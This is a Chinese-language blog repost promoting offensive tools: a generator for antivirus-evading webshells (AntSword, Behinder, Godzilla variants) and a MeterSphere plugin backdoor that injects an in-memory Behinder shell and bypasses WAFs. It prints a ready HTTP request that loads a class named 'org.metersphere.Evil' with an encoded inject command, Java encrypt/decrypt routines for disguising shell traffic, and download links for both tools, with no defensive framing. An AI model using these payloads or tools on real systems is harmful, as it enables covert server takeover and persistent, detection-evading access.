一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

2024年1月26日09:51:58评论25 views字数 2230阅读7分26秒阅读模式

0x01 工具介绍

shell_Generate

该工具没什么技术含量，学了一点javafx，使用jdk8开发出了几个简单功能用来管理webshell。页面比较LOW。工具整合并改写了各类webshell，支持各个语言的cmd、蚁剑、冰蝎、哥斯拉，又添加了实际中应用到的一些免杀技巧，以方便实际需要。

一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

Sphere-plugin-Backdoor

支持注入内存马和Bypass WAF

下载地址在末尾

0x02 功能简介

Sphere-plugin-Backdoor介绍

命令执行

一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

注入内存马

传入inject编码后的Base64进行注入冰蝎内存马

POST /plugin/customMethod HTTP/1.1Host: localhost:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Connection: closeCookie: MS_SESSION_ID=75407ecc-369b-48a7-ae80-d000f0d1b700Cache-Control: max-age=0Content-Type: application/jsonContent-Length: 65{  "entry": "org.metersphere.Evil",  "request": "aW5qZWN0"}

冰蝎加密函数

private byte[] Encrypt(byte[] data) {    byte[] dt = new byte[data.length];    for (int i = 0; i < data.length; i++) {        dt[i] = (byte) (data[i] + 1);    }    try {        java.io.ByteArrayOutputStream o = new java.io.ByteArrayOutputStream();        java.util.zip.GZIPOutputStream g = new java.util.zip.GZIPOutputStream(o);        g.write(dt);        g.close();        byte[] c = o.toByteArray();        byte[] ct = new byte[c.length];        for (int i = 0; i < c.length; i++) {            ct[i] = (byte) (c[i] + 1);        }        return ct;    } catch (Exception ignored) {    }    return data;}

冰蝎解密函数

private byte[] Decrypt(byte[] data) {    byte[] dt = new byte[data.length];    for (int i = 0; i < data.length; i++) {        dt[i] = (byte) (data[i] - 1);    }    try {        java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);        java.util.zip.GZIPInputStream i = new java.util.zip.GZIPInputStream(t, dt.length);        byte[] c = r(i);        byte[] ct = new byte[c.length];        for (int b = 0; b < c.length; b++) {            ct[b] = (byte) (c[b] - 1);        }        return ct;    } catch (Exception ignored) {    }    return data;}private byte[] r(java.io.InputStream i) {    byte[] temp = new byte[1024];    java.io.ByteArrayOutputStream b = new java.io.ByteArrayOutputStream();    int n;    try {        while((n = i.read(temp)) != -1) {b.write(temp, 0, n);        }} catch (Exception ignored) {    }    return b.toByteArray();}

一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

0x03更新介绍

兼容java.util 和 sun.misc 两个包jsp部分将404状态码修改为按钮，默认返回200状态码新增AntSword_jspjs无jsp标签webshell新增asmx_Godzilla_CSHAP_ASMX_AES_BASE64 webshel优化部分免杀代码

0x04 使用介绍

shell_Generate使用介绍

直接下载releases版即可

一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

0x05 下载

注入内马工具：
https://codeload.github.com/wafinfo/MeterSphere-plugin-Backdoor/zip/refs/heads/mainWebshell

免杀生成工具：
https://github.com/cseroad/Webshell_Generate/releases/download/v1.2.2/Webshell_Generate-1.2.2.jar

原文始发于微信公众号（渗透安全HackTwo）：一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

左青龙
微信扫一扫

右白虎
微信扫一扫

一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具

shell_Generate

注入内存马

冰蝎加密函数

shell_Generate使用介绍

SpringBlade list SQL注入批量检测工具

SpringBlade error/list SQL 注入漏洞(附工具)

SharpADWS - 滥用 ADWS 协议枚举 Active Directory

一款专注于spring框架的渗透测试工具

渗透必备悬剑武器库5.04版 .

badKarma：一款功能强大的网络侦查GUI工具

Deswing ：图形化Java反序列化利用工具，集成Ysoserial

【红队】一款集成多个测绘平台的图形化工具：Search_Viewer

工具分享-微信多种凭证泄露检测工具(尝鲜版)

mRemoteNG自动化解密工具

发表评论

在线咨询

微信